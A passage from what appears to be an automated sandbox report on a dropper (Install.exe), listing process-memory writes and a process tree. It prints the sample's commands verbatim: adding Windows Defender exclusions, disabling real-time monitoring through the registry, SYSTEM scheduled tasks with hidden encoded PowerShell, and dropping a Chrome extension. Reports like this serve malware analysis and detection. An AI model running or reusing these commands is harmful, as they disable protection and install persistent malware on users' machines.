WMIC.exe Token: SeRestorePrivilege 2540 WMIC.exe Token: SeShutdownPrivilege 2540 WMIC.exe Token: SeSystemEnvironmentPrivilege 2540 WMIC.exe Token: SeUndockPrivilege 2540 WMIC.exe Token: SeManageVolumePrivilege 2540 WMIC.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2508 WMIC.exe Token: SeIncreaseQuotaPrivilege 2508 WMIC.exe Token: SeSecurityPrivilege 2508 WMIC.exe Token: SeTakeOwnershipPrivilege 2508 WMIC.exe Token: SeLoadDriverPrivilege 2508 WMIC.exe Token: SeSystemtimePrivilege 2508 WMIC.exe Token: SeBackupPrivilege 2508 WMIC.exe Token: SeRestorePrivilege 2508 WMIC.exe Token: SeShutdownPrivilege 2508 WMIC.exe Token: SeSystemEnvironmentPrivilege 2508 WMIC.exe Token: SeUndockPrivilege 2508 WMIC.exe Token: SeManageVolumePrivilege 2508 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2660 wrote to memory of 2772 2660 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe 31 PID 2660 wrote to memory of 2772 2660 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe 31 PID 2660 wrote to memory of 2772 2660 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe 31 PID 2660 wrote to memory of 2772 2660 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe 31 PID 2660 wrote to memory of 2772 2660 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe 31 PID 2660 wrote to memory of 2772 2660 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe 31 PID 2660 wrote to memory of 2772 2660 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe 31 PID 2772 wrote to memory of 2784 2772 Install.exe 32 PID 2772 wrote to memory of 2784 2772 Install.exe 32 PID 2772 wrote to memory of 2784 2772 Install.exe 32 PID 2772 wrote to memory of 2784 2772 Install.exe 32 PID 2772 wrote to memory of 2784 2772 Install.exe 32 PID 2772 wrote to memory of 2784 2772 Install.exe 32 PID 2772 wrote to memory of 2784 2772 Install.exe 32 PID 2784 wrote to memory of 1948 2784 Install.exe 34 PID 2784 wrote to memory of 1948 2784 Install.exe 34 PID 2784 wrote to memory of 1948 2784 Install.exe 34 PID 2784 wrote to memory of 1948 2784 Install.exe 34 PID 2784 wrote to memory of 1948 2784 Install.exe 34 PID 2784 wrote to memory of 1948 2784 Install.exe 34 PID 2784 wrote to memory of 1948 2784 Install.exe 34 PID 1948 wrote to memory of 2576 1948 forfiles.exe 36 PID 1948 wrote to memory of 2576 1948 forfiles.exe 36 PID 1948 wrote to memory of 2576 1948 forfiles.exe 36 PID 1948 wrote to memory of 2576 1948 forfiles.exe 36 PID 1948 wrote to memory of 2576 1948 forfiles.exe 36 PID 1948 wrote to memory of 2576 1948 forfiles.exe 36 PID 1948 wrote to memory of 2576 1948 forfiles.exe 36 PID 2576 wrote to memory of 2608 2576 cmd.exe 37 PID 2576 wrote to memory of 2608 2576 cmd.exe 37 PID 2576 wrote to memory of 2608 2576 cmd.exe 37 PID 2576 wrote to memory of 2608 2576 cmd.exe 37 PID 2576 wrote to memory of 2608 2576 cmd.exe 37 PID 2576 wrote to memory of 2608 2576 cmd.exe 37 PID 2576 wrote to memory of 2608 2576 cmd.exe 37 PID 2608 wrote to memory of 920 2608 powershell.exe 38 PID 2608 wrote to memory of 920 2608 powershell.exe 38 PID 2608 wrote to memory of 920 2608 powershell.exe 38 PID 2608 wrote to memory of 920 2608 powershell.exe 38 PID 2608 wrote to memory of 920 2608 powershell.exe 38 PID 2608 wrote to memory of 920 2608 powershell.exe 38 PID 2608 wrote to memory of 920 2608 powershell.exe 38 PID 2784 wrote to memory of 2888 2784 Install.exe 39 PID 2784 wrote to memory of 2888 2784 Install.exe 39 PID 2784 wrote to memory of 2888 2784 Install.exe 39 PID 2784 wrote to memory of 2888 2784 Install.exe 39 PID 2784 wrote to memory of 2888 2784 Install.exe 39 PID 2784 wrote to memory of 2888 2784 Install.exe 39 PID 2784 wrote to memory of 2888 2784 Install.exe 39 PID 2788 wrote to memory of 856 2788 taskeng.exe 42 PID 2788 wrote to memory of 856 2788 taskeng.exe 42 PID 2788 wrote to memory of 856 2788 taskeng.exe 42 PID 2788 wrote to memory of 856 2788 taskeng.exe 42 PID 856 wrote to memory of 2656 856 WCEJedM.exe 43 PID 856 wrote to memory of 2656 856 WCEJedM.exe 43 PID 856 wrote to memory of 2656 856 WCEJedM.exe 43 PID 856 wrote to memory of 2656 856 WCEJedM.exe 43 PID 856 wrote to memory of 2096 856 WCEJedM.exe 45 PID 856 wrote to memory of 2096 856 WCEJedM.exe 45 PID 856 wrote to memory of 2096 856 WCEJedM.exe 45 PID 856 wrote to memory of 2096 856 WCEJedM.exe 45 PID 1940 wrote to memory of 2872 1940 taskeng.exe 48 PID 1940 wrote to memory of 2872 1940 taskeng.exe 48 PID 1940 wrote to memory of 2872 1940 taskeng.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe"C:\Users\Admin\AppData\Local\Temp\56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\7zSED3C.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Users\Admin\AppData\Local\Temp\7zSF113.tmp\Install.exe.\Install.exe /BRSVdidGUSXG "385132" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "blQxnfAaNNFZMWpemd" /SC once /ST 22:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\tjbVMJzaQRjGVhY\WCEJedM.exe\" XC /iVqdidagd 385132 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 5084⤵
- Loads dropped DLL
- Program crash
PID:2060
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {867D06D4-E512-4260-B5F0-05E1AED67ECE} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\tjbVMJzaQRjGVhY\WCEJedM.exeC:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\tjbVMJzaQRjGVhY\WCEJedM.exe XC /iVqdidagd 385132 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghTPzbAwE" /SC once /ST 01:08:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghTPzbAwE"3⤵PID:2096
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghTPzbAwE"3⤵PID:328
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2172
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:616
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1624
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdYVIXfoM" /SC once /ST 00:11:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdYVIXfoM"3⤵PID:1660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdYVIXfoM"3⤵PID:1792
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2488
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:800
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:896 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:323⤵PID:2936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:643⤵PID:2776
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:323⤵PID:2824
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:324⤵PID:2404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:643⤵PID:708
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:644⤵PID:1720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\hwSlakOgexbeQMmf\aNlHQYMY\YdMVuEdIVuCAHhJV.wsf"3⤵PID:2924
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\hwSlakOgexbeQMmf\aNlHQYMY\YdMVuEdIVuCAHhJV.wsf"3⤵
- Modifies data under HKEY_USERS
PID:596 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JHBMAPUCCwSCzfVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JHBMAPUCCwSCzfVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:324⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WIQLPldOU" /t REG_DWORD /d 0 /reg:644⤵PID:2960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:324⤵PID:328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fjxFshYjVWUn" /t REG_DWORD /d 0 /reg:644⤵PID:2508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:324⤵PID:616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixMyiQryENPMC" /t REG_DWORD /d 0 /reg:644⤵PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:324⤵PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMeQRvtmXyxU2" /t REG_DWORD /d 0 /reg:644⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:324⤵PID:556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR" /t REG_DWORD /d 0 /reg:644⤵PID:1648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JHBMAPUCCwSCzfVB" /t REG_DWORD /d 0 /reg:324⤵PID:1708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\JHBMAPUCCwSCzfVB" /t REG_DWORD /d 0 /reg:644⤵PID:3048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo" /t REG_DWORD /d 0 /reg:324⤵PID:2988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo" /t REG_DWORD /d 0 /reg:644⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:324⤵PID:632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\hwSlakOgexbeQMmf" /t REG_DWORD /d 0 /reg:644⤵PID:1492
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gImBMFEYP" /SC once /ST 21:33:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gImBMFEYP"3⤵PID:2512
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gImBMFEYP"3⤵PID:1720
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2324
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:3012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:268
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1408
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AxfyqSaZTcFttLJtv" /SC once /ST 14:41:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\wdFsAvn.exe\" T3 /GzQEdidkW 385132 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AxfyqSaZTcFttLJtv"3⤵PID:2628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 2523⤵
- Loads dropped DLL
- Program crash
PID:2620
-
-
-
C:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\wdFsAvn.exeC:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\wdFsAvn.exe T3 /GzQEdidkW 385132 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:344 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "blQxnfAaNNFZMWpemd"3⤵PID:348
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:1560
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:1904
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:780 -
